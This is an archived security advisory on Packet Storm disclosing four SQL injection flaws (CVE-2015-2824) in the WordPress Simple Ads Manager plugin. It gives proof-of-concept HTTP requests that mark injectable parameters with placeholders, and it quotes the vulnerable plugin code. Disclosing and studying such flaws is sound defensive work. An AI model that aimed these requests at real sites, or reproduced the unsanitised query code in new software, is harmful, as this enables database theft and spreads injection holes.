Exploit the possiblities

WordPress Simple Ads Manager 2.5.94 / 2.5.96 SQL Injection

WordPress Simple Ads Manager 2.5.94 / 2.5.96 SQL Injection
Posted Apr 3, 2015
Authored by Le Hong Minh

WordPress Simple Ads Manager plugin versions 2.5.94 and 2.5.96 suffer from multiple remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
advisories | CVE-2015-2824
MD5 | 3b85d299949b55fb08c7aa45162eca99

WordPress Simple Ads Manager 2.5.94 / 2.5.96 SQL Injection

Change Mirror Download
#Vulnerability title: Wordpress plugin Simple Ads Manager - Multiple SQL
Injection
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96 #Download link:
https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2824
#Author: Le Hong Minh (minh.h.le@itas.vn) & ITAS Team


::PROOF OF CONCEPT::

---SQL INJECTION 1---

+ REQUEST:

POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101
Firefox/28.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/
Content-Length: 270
Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938;
PHPSESSID=kqvtir87g33e2ujkc290l5bmm7;
cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

action=sam_hits&hits%5B0%5D%5B%5D=<SQL INJECTION
HERE>&hits%5B1%5D%5B%5D=<SQL INJECTION HERE>&hits%5B2%5D%5B%5D=<SQL
INJECTION HERE>&level=3


- Vulnerable file: simple-ads-manager/sam-ajax.php
- Vulnerable code:

case 'sam_ajax_sam_hits':
if(isset($_POST['hits']) && is_array($_POST['hits'])) {
$hits = $_POST['hits'];
$values = '';
$remoteAddr = $_SERVER['REMOTE_ADDR'];
foreach($hits as $hit) {
$values .= ((empty($values)) ? '' : ', ')
. "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")";
}
$sql = "INSERT INTO $sTable (id, pid, event_time,
event_type, remote_addr) VALUES {$values};";
$result = $wpdb->query($sql);
if($result > 0) echo json_encode(array('success'
=> true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));
else echo json_encode(array(
'success' => false,
'result' => $result,
'sql' => $sql,
'hits' => $hits,
'values' => $values
));
}
break;




---SQL INJECTION 2---
+REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=load_posts&cstr=<SQL INJECTION HERE>&sp=Post&spg=Page

+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Vulnerable code:
case 'sam_ajax_load_posts':
$custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';
$sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) :
'Post';
$sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) :
'Page';

//set @row_num = 0;
//SELECT @row_num := @row_num + 1 AS recid
$sql = "SELECT
wp.id,
wp.post_title AS title,
wp.post_type AS type
FROM
$postTable wp
WHERE
wp.post_status = 'publish' AND
FIND_IN_SET(wp.post_type, 'post,page{$custs}')
ORDER BY wp.id;";

$posts = $wpdb->get_results($sql, ARRAY_A);

$k = 0;
foreach($posts as &$val) {
switch($val['type']) {
case 'post':
$val['type'] = $sPost;
break;
case 'page':
$val['type'] = $sPage;
break;
default:
$val['type'] = $sPost . ': '.$val['type'];
break;
}
$k++;
$val['recid'] = $k;
}
$out = array(
'status' => 'success',
'total' => count($posts),
'records' => $posts
);
break;



---SQL INJECTION 3---
+REQUEST:

POST
/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=<SQL
INJECTION HERE> HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6;
__utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
;
wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%
3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3
Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1;
wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5;
wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1;
__utmb=30068390.1.10.1427794022; __utmc=30068390
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

action=load_combo_data

+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+Vulnerable code: from line 225 to 255
case 'sam_ajax_load_combo_data':
$page = $_GET['page'];
$rows = $_GET['rows'];
$searchTerm = $_GET['searchTerm'];
$offset = ((int)$page - 1) * (int)$rows;
$sql = "SELECT
wu.id,
wu.display_name AS title,
wu.user_nicename AS slug,
wu.user_email AS email
FROM
$uTable wu
WHERE wu.user_nicename LIKE '{$searchTerm}%'
ORDER BY wu.id
LIMIT $offset, $rows;";
$users = $wpdb->get_results($sql, ARRAY_A);
$sql = "SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE
'{$searchTerm}%';";
$rTotal = $wpdb->get_var($sql);
$total = ceil((int)$rTotal/(int)$rows);
$out = array(
'page' => $page,
'records' => count($users),
'rows' => $users,
'total' => $total,
'offset' => $offset
);
break;




---SQL INJECTION 4---

+ REQUEST

POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6;
__utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
;
wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%
3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3
Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1;
wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5;
wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1;
__utmc=30068390
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

action=load_users&subscriber=<SQL INJECTION HERE>&contributor=<SQL INJECTION
HERE>&author=<SQL INJECTION HERE>&editor=<SQL INJECTION HERE>&admin=<SQL
INJECTION HERE>&sadmin=<SQL INJECTION HERE>

+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php

+ Vulnerable code: from line 188 to 223
case 'sam_ajax_load_users':
$roleSubscriber = (isset($_REQUEST['subscriber'])) ?
urldecode($_REQUEST['subscriber']) : 'Subscriber';
$roleContributor = (isset($_REQUEST['contributor'])) ?
urldecode($_REQUEST['contributor']) : 'Contributor';
$roleAuthor = (isset($_REQUEST['author'])) ?
urldecode($_REQUEST['author']) : 'Author';
$roleEditor = (isset($_REQUEST['editor'])) ?
urldecode($_REQUEST['editor']) : 'Editor';
$roleAdministrator = (isset($_REQUEST["admin"])) ?
urldecode($_REQUEST["admin"]) : 'Administrator';
$roleSuperAdmin = (isset($_REQUEST['sadmin'])) ?
urldecode($_REQUEST['sadmin']) : 'Super Admin';
$sql = "SELECT
wu.id,
wu.display_name AS title,
wu.user_nicename AS slug,
(CASE wum.meta_value
WHEN 0 THEN '$roleSubscriber'
WHEN 1 THEN '$roleContributor'
WHEN 2 THEN '$roleAuthor'
ELSE
IF(wum.meta_value > 2 AND wum.meta_value <= 7,
'$roleEditor',
IF(wum.meta_value > 7 AND wum.meta_value <= 10,
'$roleAdministrator',
IF(wum.meta_value > 10, '$roleSuperAdmin', NULL)
)
)
END) AS role
FROM $uTable wu
INNER JOIN $umTable wum
ON wu.id = wum.user_id AND wum.meta_key = '$userLevel'
ORDER BY wu.id;";
$users = $wpdb->get_results($sql, ARRAY_A);
$k = 0;
foreach($users as &$val) {
$k++;
$val['recid'] = $k;
}
$out = $users;
break;

REFERENCE:
+ https://www.youtube.com/watch?v=HPJ1r9dhIB4


Best Regards
-----------------------------------
ITAS Team (www.itas.vn)

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    22 Files
  • 2
    Nov 2nd
    28 Files
  • 3
    Nov 3rd
    10 Files
  • 4
    Nov 4th
    1 Files
  • 5
    Nov 5th
    5 Files
  • 6
    Nov 6th
    15 Files
  • 7
    Nov 7th
    15 Files
  • 8
    Nov 8th
    13 Files
  • 9
    Nov 9th
    9 Files
  • 10
    Nov 10th
    9 Files
  • 11
    Nov 11th
    3 Files
  • 12
    Nov 12th
    2 Files
  • 13
    Nov 13th
    15 Files
  • 14
    Nov 14th
    17 Files
  • 15
    Nov 15th
    19 Files
  • 16
    Nov 16th
    15 Files
  • 17
    Nov 17th
    19 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close